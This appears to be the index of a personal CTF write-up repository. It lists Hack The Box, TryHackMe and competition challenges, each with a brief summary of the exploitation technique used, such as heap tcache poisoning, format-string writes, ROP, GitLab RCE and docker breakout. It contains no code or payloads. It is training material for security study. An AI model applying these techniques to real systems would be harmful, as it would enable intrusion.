pwnscripts | tl;dr | |
---|---|---|
https://gist.github.com/blackbeard666/ | Solve scripts for challs that I don't have the time to create writeups for (or that the basic idea has been covered in other writeups here, only with a few additions). Might still create writeups for them tho. |
Hack The Box | tl;dr |
---|---|
Script Kiddie | [--redacted--] |
Armageddon | [--redacted--] |
Laboratory | gitlab 12.8.1 rce, docker-security path variable manipulation |
Love | [--redacted--] |
Spectra | [--redacted--] |
Knife | [--redacted--] |
Delivery | ticket tricks, rule-based hashcat |
Ready | gitlab 11.4.7 ssrf/csrf RCE, docker priviledged mode breakout, filesystem mount |
Tenet | [--redacted--] |
Ophiuchi | [--redacted--] |
The Notebook | [--redacted--] |
Pit | [--redacted--] |
Atom | [--redacted--] |
Monitors | [--redacted--] |
Tryhackme | tl;dr | |
---|---|---|
Inferno | bruteforce basic auth, find CVE for web ide, write forged privs | http basic auth , codiad cve , tee privesc |
Watcher | multiple privesc using different techniques | lfi , cronjobs , multiple privesc , python library hijacking |
HTB: CyberApocalypse | tl;dr | |
---|---|---|
Controller | negative index leads to integer overflow which leads to bof |
integer overflow, z3 |
Minefield | arbitrary write primitive to control destructor for RCE |
fini_array, destructors |
Harvester | just the simple stuff, made more complicated by a pokemon-themed menu |
canary leak, format string, bof |
Save the Environment | leak stack addresses from libc pointers to overwrite return address on stack |
environ variable |
SanDiego CTF | tl;dr | |
---|---|---|
Flag Dropper | ret2shellcode | |
Unique Lasso | SIGROP | syscall loop; mov rax, rdx |
Pragyan CTF | tl;dr | |
---|---|---|
login | format string to overwrite size field for buffer overflow | fmtstr_payload() |
cachetroubles | heap fengshui to get double free on tcache + unsortedbin | libc-2.31 |
angstrom CTF | tl;dr | |
---|---|---|
pawn | still studying | [--redacted--] |
carpal tunnel syndrome | still studying | [--redacted--] |
raiid shadow legends | c++ uaf | c++ raii, uaf, c++ alloc internals |
Foobar CTF | tl;dr | |
---|---|---|
deathnote | partial solve; fastbin attack, allocate misaligned memory pointer to pass malloc check and overwrite malloc hook | libc 2.23 , fastbin attack , __malloc_hook misaligned technique |
rOw Row roW | seccomp -> open-read-write shellcode | seccomp , orw , shellcode |
Volga Quals | tl;dr | |
---|---|---|
pennywise | off-by-one to control chunk pointer which is added to bin list | format string, off-by-one |
Securinets Quals | tl;dr | |
---|---|---|
killshot | format string to leak, www primitive, ropchain on heap chunk | tcache_perthread_struct , printf www , heap rop , seccomp , analysis |
deathnote | uaf, overwrite tcache entry in perthread struct to point to free hook | tcache poison , negative index write |
Nahamcon CTF | tl;dr | |
---|---|---|
meddle | usual tcache challenge, but tricky way to write to chunks | tcache poison , libc 2.27 , misaligned input |
BsidesSF CTF | tl;dr | |
---|---|---|
runme 1,2,3 | didn't allow syscall/int0x80 bytes | self-modifying shellcode |
reverseme 1,2 | xor encoded, latter part was rng | encoded shellcode |
Charge Tracker | hardcoded flag, but I wanted to try something | adb dumpsys |
zer0pts ctf | tl;dr | |
---|---|---|
Not beginner's stack | read more about stack shadow | stack shadow |
Darkcon CTF | tl;dr | |
---|---|---|
Intro | prologue | info |
Easy-ROP | bof + multiple approaches | pwn , x64 , sigrop |
Warmup | double free for leak and poison | pwn , x64 , libc-2.27 , double free , tcache poison |
ezpz | exposed log messages | android rev , adb logcat |
Take it Easy | used an online sympy ide to perform attack | crypto , low exponent attack , e = 3 |
Trollcat CTF | tl;dr | |
---|---|---|
msgbox | simple stuff | tcache poison |
0x41414141 CTF | tl;dr | |
---|---|---|
moving signals | simple stuff | sigrop |
external | program cleared the GOT after overflow, needed a way to fix it | fixing GOT , rop |
echo | most fmtstr challs are named with echo | not fmtstr |
return of the rops | learn ret2csu dummy | unintended solve |
babyheap | my first heap solve! | tcache double free |
-
Grimmcon CTF
-
Vulncon CTF
-
XMAS CTF
-
boot2root CTF
-
DefCamp CTF
-
InterIUT CTF
-
Square CTF
-
Sunshine CTF
-
Newark Academy CTF
-
CyberYoddha CTF
-
Razi CTF
-
HackLu CTF
-
DamCTF
- allokay
- finger-warmup
- schlage
- malware phase 1
-
b01lers bootcamp CTF
-
Bsides Delhi CTF
-
Bsides Boston CTF
-
EKOPARTY CTF
-
Dark CTF
-
DownUnder CTF
-
CSAW Qualifiers
-
Google CTF
-
Fword CTF
-
Arab Sec Cyber Wargames Qualifiers
- check
- DOOM